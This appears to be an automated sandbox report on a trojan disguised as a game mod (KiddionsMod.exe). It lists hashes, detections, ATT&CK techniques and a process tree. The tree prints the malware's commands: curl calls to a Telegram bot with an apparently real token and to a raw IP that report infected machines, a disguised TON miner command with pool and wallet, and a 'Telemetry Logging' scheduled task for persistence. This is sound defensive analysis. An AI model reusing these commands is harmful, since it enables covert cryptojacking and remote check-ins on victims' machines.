Analysis

  • max time kernel
    156s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    19-01-2022 21:45

General

  • Target

    KiddionsMod.exe

  • Size

    1.3MB

  • MD5

    19cfd5a417830805d328cc9e09dc14c1

  • SHA1

    836b391c349ae25da63c33438aa6a8f4b1e10748

  • SHA256

    cb69d24dbd59161cdbc6483fe59b0fc5cec108973d5a20a0636370e7c27ab201

  • SHA512

    1b2cf065b606d65e2253fda80c15848d80d3a1e0b5ab11f3cb3b73864704ca90a8d99d6e92ca45b95269dc04612822883ea87eb31da5fcd5fd992a02ab36546b

Malware Config

Signatures

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 13 IoCs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 42 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Suspicious use of SetThreadContext 21 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\KiddionsMod.exe
    "C:\Users\Admin\AppData\Local\Temp\KiddionsMod.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2828
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      #cmd
      2⤵
      • Checks computer location settings
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3084
      • C:\Users\Admin\AppData\Local\Temp\loader.exe
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Adds Run key to start application
        • Checks whether UAC is enabled
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2756
        • C:\Windows\SYSTEM32\curl.exe
          curl "https://api.telegram.org/bot5080602212:AAFzGPp7yFVoPgAstCfae6JTAOpzgmOhueI/sendMessage?chat_id=-1001744615146&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0AWorker Tag: Krutoi"
          4⤵
          PID:4020
        • C:\Windows\bfsvc.exe
          C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
          4⤵
          PID:2772
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1484
          • C:\Windows\SYSTEM32\curl.exe
            curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
            5⤵
            PID:2016
          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
            5⤵
            • Executes dropped EXE
            • Checks BIOS information in registry
            • Adds Run key to start application
            • Checks whether UAC is enabled
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:3908
            • C:\Windows\bfsvc.exe
              C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
              6⤵
              PID:2828
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:556
              • C:\Windows\SYSTEM32\curl.exe
                curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                7⤵
                PID:3484
              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                7⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Adds Run key to start application
                • Checks whether UAC is enabled
                • Suspicious use of SetThreadContext
                PID:1544
                • C:\Windows\bfsvc.exe
                  C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                  8⤵
                  PID:756
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                  8⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1420
                  • C:\Windows\SYSTEM32\curl.exe
                    curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                    9⤵
                    PID:3740
                  • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                    9⤵
                    • Executes dropped EXE
                    • Checks BIOS information in registry
                    • Adds Run key to start application
                    • Checks whether UAC is enabled
                    • Suspicious use of SetThreadContext
                    PID:1720
                    • C:\Windows\bfsvc.exe
                      C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                      10⤵
                      PID:1956
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                      10⤵
                      PID:224
                      • C:\Windows\SYSTEM32\curl.exe
                        curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                        11⤵
                        PID:2988
                      • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                        "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                        11⤵
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Adds Run key to start application
                        • Checks whether UAC is enabled
                        • Suspicious use of SetThreadContext
                        PID:2856
                        • C:\Windows\bfsvc.exe
                          C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                          12⤵
                          PID:3392
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                          12⤵
                          PID:3024
                          • C:\Windows\SYSTEM32\curl.exe
                            curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                            13⤵
                            PID:452
                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                            "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                            13⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Adds Run key to start application
                            • Checks whether UAC is enabled
                            • Suspicious use of SetThreadContext
                            PID:2928
                            • C:\Windows\bfsvc.exe
                              C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                              14⤵
                              PID:1944
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                              14⤵
                              PID:3300
                              • C:\Windows\SYSTEM32\curl.exe
                                curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                                15⤵
                                PID:3520
                              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                15⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Adds Run key to start application
                                • Checks whether UAC is enabled
                                • Suspicious use of SetThreadContext
                                PID:2368
                                • C:\Windows\bfsvc.exe
                                  C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                                  16⤵
                                  PID:220
                                • C:\Windows\explorer.exe
                                  C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                                  16⤵
                                  PID:2016
                                  • C:\Windows\SYSTEM32\curl.exe
                                    curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                                    17⤵
                                    PID:2708
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                    17⤵
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Adds Run key to start application
                                    • Checks whether UAC is enabled
                                    • Suspicious use of SetThreadContext
                                    PID:3060
                                    • C:\Windows\bfsvc.exe
                                      C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                                      18⤵
                                      PID:3580
                                    • C:\Windows\explorer.exe
                                      C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                                      18⤵
                                      PID:1340
                                      • C:\Windows\SYSTEM32\curl.exe
                                        curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                                        19⤵
                                        PID:1372
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                        "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                        19⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Adds Run key to start application
                                        • Checks whether UAC is enabled
                                        • Suspicious use of SetThreadContext
                                        PID:2580
                                        • C:\Windows\bfsvc.exe
                                          C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                                          20⤵
                                          PID:2376
                                        • C:\Windows\explorer.exe
                                          C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                                          20⤵
                                          PID:904
                                          • C:\Windows\SYSTEM32\curl.exe
                                            curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                                            21⤵
                                            PID:3208
                                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                            "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                            21⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Adds Run key to start application
                                            • Checks whether UAC is enabled
                                            • Suspicious use of SetThreadContext
                                            PID:1284
                                            • C:\Windows\bfsvc.exe
                                              C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
                                              22⤵
                                              PID:2732
                                            • C:\Windows\explorer.exe
                                              C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
                                              22⤵
                                              PID:3964
                                              • C:\Windows\SYSTEM32\curl.exe
                                                curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
                                                23⤵
                                                PID:912
      • C:\Users\Admin\AppData\Roaming\asf3r3.exe
        "C:\Users\Admin\AppData\Roaming\asf3r3.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3100
      • C:\Users\Admin\AppData\Roaming\e3dwefw.exe
        "C:\Users\Admin\AppData\Roaming\e3dwefw.exe"
        3⤵
        • Executes dropped EXE
        PID:2412
        • C:\Windows\SysWOW64\schtasks.exe
          /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
          4⤵
          • Creates scheduled task(s)
          PID:828
  • C:\Windows\System32\WaaSMedicAgent.exe
    C:\Windows\System32\WaaSMedicAgent.exe dc10dc428c424782dfda32cfa06f8fbf oWLZ1E4gW0a9DAkkf1GvUg.0.1.0.0.0
    1⤵
    • Modifies data under HKEY_USERS
    PID:624
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1836
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1160
  • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
    1⤵
    • Executes dropped EXE
    PID:3900
    • C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
      2⤵
      • Creates scheduled task(s)
      PID:1896

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Execution
    Scheduled Task (1) T1053
  • Persistence
    Registry Run Keys / Startup Folder (2) T1060
    Scheduled Task (1) T1053
  • Privilege Escalation
    Scheduled Task (1) T1053
  • Defense Evasion
    Virtualization/Sandbox Evasion (1) T1497
    Modify Registry (2) T1112
  • Credential Access
    Credentials in Files (2) T1081
  • Discovery
    Query Registry (5) T1012
    Virtualization/Sandbox Evasion (1) T1497
    System Information Discovery (5) T1082
  • Collection
    Data from Local System (2) T1005
Downloads

  • C:\Users\Admin\AppData\Local\Temp\loader.exe
    MD5
    1393255baa29e16a2a5cf2afa989e1e8
    SHA1
    37e362a244a64dc1ab3aa34b0f39fc96134abd02
    SHA256
    dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875
    SHA512
    a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
    MD5
    67486b272027c5c08c37d2a7dfa3b019
    SHA1
    660cd3fa71e480e03b392ccfff95b1a651ec1563
    SHA256
    cb2f3c7a11ff1993ed3a24d396beeca0f06842b9cd9097351a7c8662250ec677
    SHA512
    6565af5f8e090285258a0abf4faa1c99790b409f4ed8a4233048614ca470f1d7c4a40f951bd7c2664c567f7788f9e689afb3d72fcff853d888fef5b40051cf61

• C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
  MD5      1393255baa29e16a2a5cf2afa989e1e8
  SHA1     37e362a244a64dc1ab3aa34b0f39fc96134abd02
  SHA256   dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875
  SHA512   a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d

• C:\Users\Admin\AppData\Roaming\asf3r3.exe
  MD5      654b0fbc5f45e7aa0d208a9ae2352f30
  SHA1     d91b8b6a3d1815010973db6189fc1f7b73e98dd8
  SHA256   808bad1396611118abb83a7d09940c7c47d785511db2e5b652becf9ec67cdb19
  SHA512   807a471d51a5e7f22f19a7cd0775f852519c256b3592136b4f673dcc8b53488698c5830d75cfc461937a5a485963c37e1eb4e18c40446ac241df1b859a242234

• C:\Users\Admin\AppData\Roaming\e3dwefw.exe
  MD5      67486b272027c5c08c37d2a7dfa3b019
  SHA1     660cd3fa71e480e03b392ccfff95b1a651ec1563
  SHA256   cb2f3c7a11ff1993ed3a24d396beeca0f06842b9cd9097351a7c8662250ec677
  SHA512   6565af5f8e090285258a0abf4faa1c99790b409f4ed8a4233048614ca470f1d7c4a40f951bd7c2664c567f7788f9e689afb3d72fcff853d888fef5b40051cf61

• memory/224-225-0x0000000140000000-0x000000014002A000-memory.dmp  Filesize 168KB
• memory/556-189-0x0000000140000000-0x000000014002A000-memory.dmp  Filesize 168KB
• memory/904-301-0x0000000140000000-0x000000014002A000-memory.dmp  Filesize 168KB
• memory/1284-314-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/1284-316-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/1284-315-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/1340-292-0x0000000140000000-0x000000014002A000-memory.dmp  Filesize 168KB
• memory/1420-207-0x0000000140000000-0x000000014002A000-memory.dmp  Filesize 168KB
• memory/1484-170-0x0000000140000000-0x000000014002A000-memory.dmp  Filesize 168KB
• memory/1484-169-0x0000000140000000-0x000000014002A000-memory.dmp  Filesize 168KB
• memory/1544-202-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/1544-203-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/1544-204-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/1720-221-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/1720-220-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/1720-222-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/2016-274-0x0000000140000000-0x000000014002A000-memory.dmp  Filesize 168KB
• memory/2368-269-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/2368-270-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/2368-271-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/2580-298-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/2580-297-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/2580-296-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/2756-167-0x00007FF7575B0000-0x00007FF757E98000-memory.dmp  Filesize 8.9MB
• memory/2756-165-0x00007FF7575B0000-0x00007FF757E98000-memory.dmp  Filesize 8.9MB
• memory/2756-166-0x00007FF7575B0000-0x00007FF757E98000-memory.dmp  Filesize 8.9MB
• memory/2772-168-0x0000000140000000-0x000000014274C000-memory.dmp  Filesize 39.3MB
• memory/2828-133-0x0000000005BD0000-0x0000000005C62000-memory.dmp  Filesize 584KB
• memory/2828-137-0x0000000005F70000-0x0000000005FE6000-memory.dmp  Filesize 472KB
• memory/2828-150-0x0000000005B40000-0x0000000005B5E000-memory.dmp  Filesize 120KB
• memory/2828-132-0x0000000006180000-0x0000000006724000-memory.dmp  Filesize 5.6MB
• memory/2828-131-0x0000000005AF0000-0x0000000005AF1000-memory.dmp  Filesize 4KB
• memory/2828-130-0x0000000000FE0000-0x0000000001140000-memory.dmp  Filesize 1.4MB
• memory/2828-151-0x0000000006020000-0x000000000602A000-memory.dmp  Filesize 40KB
• memory/2856-244-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/2856-246-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/2856-243-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/2928-251-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/2928-252-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/2928-253-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/3024-249-0x0000000140000000-0x000000014002A000-memory.dmp  Filesize 168KB
• memory/3060-289-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/3060-287-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/3060-288-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/3084-155-0x00000000049B0000-0x00000000049C2000-memory.dmp  Filesize 72KB
• memory/3084-162-0x00000000074D0000-0x0000000007520000-memory.dmp  Filesize 320KB
• memory/3084-157-0x0000000005540000-0x0000000005702000-memory.dmp  Filesize 1.8MB
• memory/3084-158-0x0000000004900000-0x0000000004F18000-memory.dmp  Filesize 6.1MB
• memory/3084-156-0x0000000004AE0000-0x0000000004BEA000-memory.dmp  Filesize 1.0MB
• memory/3084-154-0x0000000004F20000-0x0000000005538000-memory.dmp  Filesize 6.1MB
• memory/3084-153-0x0000000000500000-0x000000000056C000-memory.dmp  Filesize 432KB
• memory/3084-161-0x0000000006830000-0x000000000686C000-memory.dmp  Filesize 240KB
• memory/3084-159-0x00000000069D0000-0x0000000006EFC000-memory.dmp  Filesize 5.2MB
• memory/3084-160-0x0000000006580000-0x00000000065E6000-memory.dmp  Filesize 408KB
• memory/3100-245-0x0000000004F40000-0x0000000005558000-memory.dmp  Filesize 6.1MB
• memory/3100-240-0x0000000000740000-0x0000000000760000-memory.dmp  Filesize 128KB
• memory/3300-256-0x0000000140000000-0x000000014002A000-memory.dmp  Filesize 168KB
• memory/3908-186-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/3908-184-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/3908-185-0x00007FF641840000-0x00007FF642128000-memory.dmp  Filesize 8.9MB
• memory/3964-319-0x0000000140000000-0x000000014002A000-memory.dmp  Filesize 168KB